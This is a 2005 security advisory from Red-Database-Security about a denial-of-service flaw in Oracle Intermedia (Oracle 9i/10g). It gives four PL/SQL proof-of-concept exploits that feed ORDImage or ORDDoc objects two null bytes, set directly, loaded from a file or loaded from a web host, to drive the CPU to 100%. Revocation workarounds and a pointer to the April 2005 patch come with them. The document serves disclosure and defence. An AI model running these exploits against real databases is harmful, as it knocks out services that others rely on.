Services
Information
Company |
Denial of Service via Oracle Intermedia in Oracle 9i / 10g
Details The following proof of concept exploit code is doing a denial of serivce attack. The Oracle process spins and the CPU is consuming 100%. Workarounds REVOKE EXECUTE ON ORDSYS.ORDIMAGE FROM PUBLIC FORCE; REVOKE EXECUTE ON ORDSYS.ORDDOC FROM PUBLIC FORCE; Example -- Exploit 1: Explicitly setting two null bytes to localData property DECLARE Image1 ORDSYS.ORDImage; BEGIN Image1 := ORDSYS.ORDImage.init(); Image1.source.localData := TO_BLOB(HEXTORAW('0000')); Image1.setProperties; END; / -- Exploit 2: Load from filesystem DECLARE Image ORDSYS.ORDImage; BEGIN Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR', 'file_with_two_null_bytes.jpg'); Image.setProperties; END; / -- Exploit 3: Load from web DECLARE Image ORDSYS.ORDImage; BEGIN Image := ORDSYS.ORDImage.init('HTTP', 'www.evildba.com/', 'file_with_two_null_bytes.jpg'); Image.setProperties; END; / -- Exploit 4: Explicitly setting two null bytes to localData property of ORDDoc type. DECLARE Doc ORDSYS.ORDDoc; X RAW(30000); BEGIN Doc := ORDSYS.ORDDoc.init(); Doc.source.localData := TO_BLOB(HEXTORAW('0000')); Doc.setProperties (X, FALSE); END; / Patch Information Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005. © 2005 by Red-Database-Security GmbH - last update 29-april-2005 © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |